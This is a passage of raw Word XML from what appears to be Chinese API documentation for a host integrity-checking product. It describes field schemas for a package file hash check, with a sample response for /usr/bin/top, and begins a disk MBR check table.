            <w:r>
              <w:t>包版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3CEDB7E2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33B385F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>package_full_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09276AF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="483F4079" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D994B62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>包名全称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5237BF72" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06B4254F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>package_hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4807F0C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73AC30FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FE07D68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>软件包备份的MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12FE73A5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FB848E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BD10974" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D646A94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50597586" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>脚本扫描计算的MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C2D3EFC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46A72BE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>access_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="164B0D4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58498C59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="189A2294" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件的最近访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60DA66B9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ED644BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>modify_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D178517" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A597DF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4641AEC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件内容的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5143D393" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35A3B906" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64FDF1A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D2C384E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247901B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39E6AFAB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32187F2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70D3B3D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04A73ECA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F206C47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="19441C6E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61EDFEB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>change_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0251E39D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A95C0CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E1225E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件属性的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="199F32BF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65036CD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F728B5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7858FE71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="092633D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="700DC8A8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B6A7DFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F701A05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AA2F3C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="386E06F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="50ACCFEB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BD7C533" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FB50C37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA2A040" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CEAA444" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4B9599A4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10B15718" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E66FCB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FF935B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="268EB3D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="79739ADE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45340950" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="785608A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17967FD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03B2B26C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="793056D4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63093B58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7436932E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CB94159" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A0CD411" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E800E3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AEDA28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "package_full_name": "procps_1:3.3.9-1ubuntu2.3_amd64",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "modify_time": 1554124485,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "package_name": "procps",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "package_hash": "f482a1f4e8809875d0d1b93d5f02709e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "change_time": 1554124485,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_sha256": </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"20c5ecccfd63cd5eeb701b34690ebadf1a532222105c572a2d38021fee8c1824",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_sha1": "bf84d15e81b28cdc5c8227c8d261a43ccd5ad929",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_name": "/usr/bin/top",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "access_time": 1554083656,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_md5": "f52296c7e3e42b2919e131f5af21e6e1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_permission": "rwxr-xr-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "package_version": "1:3.3.9-1ubuntu2.3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_hash": "f52296c7e3e42b2919e131f5af21e6e1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_owner": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_size": 106832,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_group": "root"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF3F983" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="236" w:name="检查功能磁盘mbr检查"/>
      <w:bookmarkEnd w:id="235"/>
      <w:r>
        <w:t>检查功能：磁盘MBR检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B7ED48"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1276"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="2056"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="493358C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016C310" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="144629D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62BFB53B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F988501" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4730B7B2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51E15C80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>com_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DA679A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06961619" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46DA7E6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>COM ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72E612C8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="330405ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pcid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C641BE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="678F5FB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02578716" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>PC ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="08B56102" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F6B80E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dist_ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A3D5DF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F4A6ED2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="658A60ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>linux发行版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AB4DC7B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31573556" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>grub_ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
